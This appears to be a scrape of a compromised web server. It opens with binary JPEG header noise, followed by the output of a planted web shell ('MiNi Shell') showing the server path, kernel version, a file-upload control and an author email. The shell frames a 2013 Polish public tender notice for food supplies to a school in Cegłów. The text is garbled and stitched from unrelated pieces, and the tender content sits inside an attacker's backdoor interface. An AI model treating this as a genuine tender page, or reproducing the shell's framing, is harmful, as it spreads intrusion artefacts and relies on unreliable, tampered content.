JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/99472-N-2013.html

<p class="kh_header"><b>Cegłów: Przedmiotem zamówienia jest  zakup wraz z dostawa artykułów spożywczych do Zespołu Szkolnego w Cegłowie</b><br>
<b>Numer ogłoszenia: 99472 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cegłów , ul. Kościuszki 4, 05-319 Cegłów, woj. mazowieckie, tel. 025 579 59 48, 025 759 59 39, faks 025 759 59 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ceglow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest  zakup wraz z dostawa artykułów spożywczych do Zespołu Szkolnego w Cegłowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje sukcesywne dostawy artykułów spożywczych do Zespołu Szkolnego w Cegłowie przy ulicy Poprzecznej 27. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zamawianych dostaw o 20% w związku z możliwą zmianą ilości uczniów korzystających z żywienia. Wykonawca będzie zobowiązany dostarczyć i rozładować przedmiot zamówienia na wskazane przez zamawiającego miejsce na terenie Zespołu Szkół w Cegłowie przy ul. Poprzecznej 27, z wyłączeniem pieczywa które należy dostarczać bezpośrednio do placówek oświatowych na terenie Gminy Cegłów . Dostawy przedmiotu zamówienia odbywać się będą sukcesywnie raz - dwa razy w tygodniu, z wyłączeniem pieczywa, które należy dostarczać w każdy dzień tygodnia,  po telefonicznym lub faksem lub mailem zamówieniu złożonym przez osoby upoważnione przez Zamawiającego w przeddzień dostawy, w dni robocze w godzinach 7.00-15.00,  transportem wykonawcy przeznaczonym do przewozu artykułów spożywczych , zgodnie z przepisami wydanymi na podstawie ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia ( Dz. U. z 2006 r. Nr 171 poz. 1225 z późniejszymi zmianami). Artykuły spożywcze muszą spełniać wymagania wszystkich odpowiednich norm oraz posiadać wszelkie niezbędne dokumenty i atesty dopuszczające do obrotu na terenie kraju. Zamówienia będą realizowane przez okres 12 miesięcy od dnia podpisania umowy. Termin przydatności do spożycia w chwili dostawy do Zamawiającego, nie może być krótszy niż ? okresu, w którym towar zachowuje zdatność do spożycia, określona na opakowaniu lub w Polskiej Normie.
Część 1 - Różne produkty spożywcze kod CPV 15800000-6 . 
Barszcz biały 56g - 220 szt. Cukier kryształ 1 kg Królewski lub równoważny - 700kg. Cukier waniliowy 32g - 200 szt., Chrzan 260g delikatesowy Mosso lub równoważny - 10 szt. Dżem brzoskwiniowy 280g Słoneczny Ogród lub równoważny - 100szt. Dżem truskawkowy 280g Słoneczny Ogród lub równoważny - 100 szt. Galaretka owocowa 79g Delecta lub równoważna - 1800szt. Herbata ekspresowa czarna Cejlon 100g Jones lub równoważna - 10szt.  Herbata owocowa ekspresowa 40 saszetek x 2,3g Herbapol lub równoważna - 100 szt. Kasza jęczmienna perłowa średnia 1 kg - 350 kg. Kasza manna 1 kg - 40 kg. Rozpuszczalna kawa zbożowa Inka lub równoważna 150g - 30szt. Koncentrat pomidorowy 30% 0,5l Łowicz lub równoważny - 100szt. Kostki rosołowe 6 kostek w opakowaniu Winiary lub równoważne - 20szt. Kwasek cytrynowy 20g - 30szt. Majeranek otarty 20 g - 50szt. Oregano 10 g Prymat lub równoważne - 30szt. Zioła prowansalskie 10 g Prymat lub równoważne - 30szt. Bazylia 10 g Prymat lub równoważne - 30szt. Mąka pszenna typ 480 1 kg Szymanowska lub równoważna - 150kg. Majonez napoleoński 320 g Mosso lub równoważny - 200szt. Makaron nitki 400g Lubella lub równoważny - 280 szt. Makaron muszelka 400g Lubella lub równoważny - 150 szt. Makaron świderki 400g Lubella lub równoważny - 630 szt. Makaron spaghetti 500g - 400 szt. Masło roślinne 500g Kruszwica lub równoważne - 25 szt. Miód naturalny 400g Sądecki Bartnik lub równoważny - 25 szt. Olej 3l Kujawski lub równoważny - 200 szt. Pieprz naturalny mielony 20g - 150szt. Pasztet drobiowy 195g Podlaski lub równoważny - 90 szt. Ryż biały długoziarnisty 1 kg - 200 kg. Ryż w saszetkach Britta lub równoważny - 200 szt. Ser topiony 100g - 250 szt. Sok domowy malina 430 ml Paola lub równoważny - 50 szt. Sól jodowana spożywcza 1 kg Kujawska lub równoważna - 200 kg. Przyprawa warzywna do potraw 200g Vegeta lub równoważna - 500 szt. Kakao 300g  Puchatek  lub równoważne - 40 szt. Szczaw konserwowy 300g - 100 szt. Chrupki kukurydziane 240g Corn Flakes lub równoważne -200 szt. Płatki kukurydziane 250 g Corn Flakes lub równoważne - 150 szt. Kuleczki zbożowe o smaku czek. 1000g OBST Chełm lub równoważne - 40 szt. Ogórki konserwowe 0,9l Dawtona lub równoważne - 300 szt. Krem orzechowo - czekoladowy 230g Nutella lub równoważny - 50 szt. Jabłka prażone 810g - 200 szt. Kompot wiśniowy 0,9l - 500 szt. Ciastka wafle 280g - 200 szt. Ciastka kruche Tago lub równoważne - 20 kg. Delicje szampańskie 147g - 240 szt. Zacierki	250g - 60 szt. Pieczarki świeże - 60 kg. Rodzynki 1000g - 12 szt. Ketchup pikantny 1000g Dawtona lub równoważny - 10 szt. Mleko w proszku 26% 500g OSM Siedlce lub równoważne - 40 szt. Pomidory krojone z bazylią i  oregano 390g Podravka lub równoważne - 55 szt. 

Część 2	 - Owoce warzywa i podobne produkty PVC 15300000-1  
Buraki - 60kg. Seler - 300kg. Por - 90kg. Pietruszka - 300kg. Cebula - 150kg. Ziemniaki - 12000kg. Sałata główki - 120szt. Ogórki przecier - 20kg. Kapusta biała - 350kg. Kapusta pekińska - 450kg. Kapusta kwaszona - 450kg. Rzodkiewka pęczki - 100szt. Marchew	- 1700kg.

Część 3 - Produkty zwierzęce, mięso i produkty mięsne CVP 15100000-9 
Słonina - 150kg. Schab środkowy - 60kg. Szynka b/kości - 800kg. Mięso mielone wieprzowe mrożone 480g  Sokołów lub równoważne - 700 szt. Mięso mielone drobiowe - 600kg. Udziki drobiowe - 700kg. Piersi z kurczaka - 800kg. Porcje rosołowe - 1300kg. Smalec wieprzowy 200g - 30kg. Schab karkowy - 70kg. 

Część 4 - Pieczywo, świeże wyroby piekarskie i ciastkarskie PVC 15810000-9 
Bułka paryska krojona 0,30kg - 1200 szt. Chleb baltonowski krojony 0,5 kg - 200 szt. Rogaliki drożdżowe 50 g - 3000 szt. Pączki 80g - 3000 szt. Bułka tarta 1 kg - 150 kg.	

Część 5 - Nabiał CVP 15500000-3, 03142500-3, 15540000-3 
Masło 200g Zambrowskie Mlemix lub równoważne - 800 szt. Mleko 3,2% butelki 1l Mlekowita lub równoważne - 2500 szt. Śmietana 18% 400g Piątnica lub równoważne - 1300 szt. Śmietana 30% 0,5 l Łaciata lub równoważna - 50 szt. Jogurt truskawkowy 5% 120g Gratka lub równoważny - 6000 szt.  Jajka - 3500 szt. Twaróg śmietankowy 1000g - 500 szt. Ser żółty Salami lub równoważny - 25 kg.

Część 6 - Wyroby garmażeryjne CVP 15851000-8,  15310000-4 
Pierogi z serem - 630kg. Kluski kopytka - 750kg. Kluski śląskie - 750kg. Paszteciki z mięsem - 750kg. Kulebiaki drożdżowe z mięsem - 200kg. Kulebiaki drożdżowe z kapustą - 200kg. Pyzy ziemniaczane - 750kg.

Część 7 - Owoce, warzywa i podobne produkty. PCV 15300000-1 ,
Śliwka langroda ciemna - 30kg. Banany - 200kg. Gruszka 	konferencja - 50kg. Gruszka klapsa - 50kg. Kiwi - 50kg. Jabłko jonagold - 300kg. Jabłko kortland - 300kg. Jabłko lobo - 300kg. Jabłko champion - 300kg. Mandarynki - 60kg. Pomarańcze - 120kg. Winogrona - 50kg. Nektarynki - 15kg. Brzoskwinie - 15kg. 

Część 8   - Ryby mrożone, filety rybne i pozostałe mięso ryb.  Paluszki rybne CVP 15220000-6. 15241700-6 
Filet z miruny - 500kg. Paluszki rybne - 240kg.

Część 9 - Produkty zwierzęce, mięso i produkty mięsne 15100000-9 
Parówki drobiowe Sokołów lub równoważne - 50kg. Kiełbasa żywiecka Sokołów lub równoważna krojona - 25kg. Kiełbasa krakowska Sokołów lub równoważna krojona - 25kg. Polędwica  wieprzowa krojona - 5kg. Polędwica drobiowa krojona - 5kg. Szynka wieprzowa krojona - 10kg.

Część 10 - Warzywa mrożone CVP 15331170-9 
Marchew kostka 500g - 800 szt. Truskawki 500g - 280 szt. Zupa jarzynowa 500g - 180 szt. Zupa fasolowa 500g - 180 szt. Kalafior mrożony 500g - 180 szt. Brokuły mrożone 500g - 180 szt. Fasolka szparagowa 500g - 180 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 20% wartości zamówienia, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp. Zamówienie uzupełniające będzie polegało na powtórzeniu tego samego rodzaju dostaw.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.30.00.00-1, 15.10.00.00-9, 15.81.00.00-9, 15.50.00.00-3, 03.14.25.00-3, 15.54.00.00-3, 15.85.10.00-8, 15.31.00.00-1, 15.22.00.00-6, 15.24.17.00-6, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje ustanowienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować należyte  wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch dostaw produktów spożywczych do punktów żywienia zbiorowego o wartości brutto co najmniej 20 000,00zł  dwadzieścia tysięcy), każda z dostaw .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje ustanowienia w/w warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje odpowiednie do stanowisk, jakie zostaną im powierzone, 
Osoby dostarczające produkty spożywcze muszą posiadać aktualne badania lekarskie do celów sanitarno-epidemiologicznych, które będą świadczyć o braku przeciwwskazań do wykonywania prac, przy których istnieje możliwość przeniesienia zakażenia na inne osoby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje ustanowienia w/w warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1)gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT),
2)wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia,
3)konieczności zmiany terminu realizacji w związku z brakiem możliwości prowadzenia dostaw na skutek obiektywnych warunków klimatycznych lub
działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub
innymi okolicznościami niepowstałymi z winy Wykonawcy 
4)wystąpienia konieczności ograniczenia zakresu rzeczowego przedmiotu zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ceglow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Cegłów 
ul. Kościuszki 4
05-319 Cegłów
pok. nr. 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 10:00, miejsce: Urząd Gminy Cegłów 
ul. Kościuszki 4
05-319 Cegłów
pok. nr. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt nie jest finansowany ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com